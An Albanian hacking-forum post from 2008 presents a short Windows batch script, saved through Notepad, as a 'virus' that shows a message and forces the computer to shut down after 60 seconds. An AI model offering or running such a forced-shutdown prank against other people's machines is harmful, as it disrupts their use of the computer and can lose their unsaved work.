oLTi@NeT

Mirė Se Vini ne oLTi@NeT Froum
 
ForumPortaliRegjistrohuidentifikimi

Share
 

 »»» Si Ta Krijojm Nje Virus Se E Nal Pcn Me Notepad «««

Shko poshtė 
AutoriMesazh
diar.zz
Administrator
Administrator
diar.zz

Male Numri i postimeve : 164
Age : 29
Vendii : Vushtrri
Registration date : 05/09/2008

»»» Si Ta Krijojm Nje Virus Se E Nal Pcn Me Notepad ««« Empty
MesazhTitulli: »»» Si Ta Krijojm Nje Virus Se E Nal Pcn Me Notepad «««   »»» Si Ta Krijojm Nje Virus Se E Nal Pcn Me Notepad ««« I_icon_minitimeTue Sep 09, 2008 5:23 am

1.Hapim Notepad
2.E Shkruajm Kete:

@echo
msg * System-Coder
shutdown -s -t 60 -c "System-Coder KHG"

3.Dhe E Ruajm SiTeDoni.bat
Mbrapsht nė krye Shko poshtė
http://olti-net.tk/
 
»»» Si Ta Krijojm Nje Virus Se E Nal Pcn Me Notepad «««
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
oLTi@NeT  :: Hacking :: Tutoriale-
Kėrce tek: